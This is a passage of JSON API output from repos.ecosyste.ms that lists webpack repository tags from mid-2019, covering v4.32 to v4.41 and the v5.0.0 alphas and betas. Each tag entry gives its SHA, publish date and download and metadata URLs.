ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https: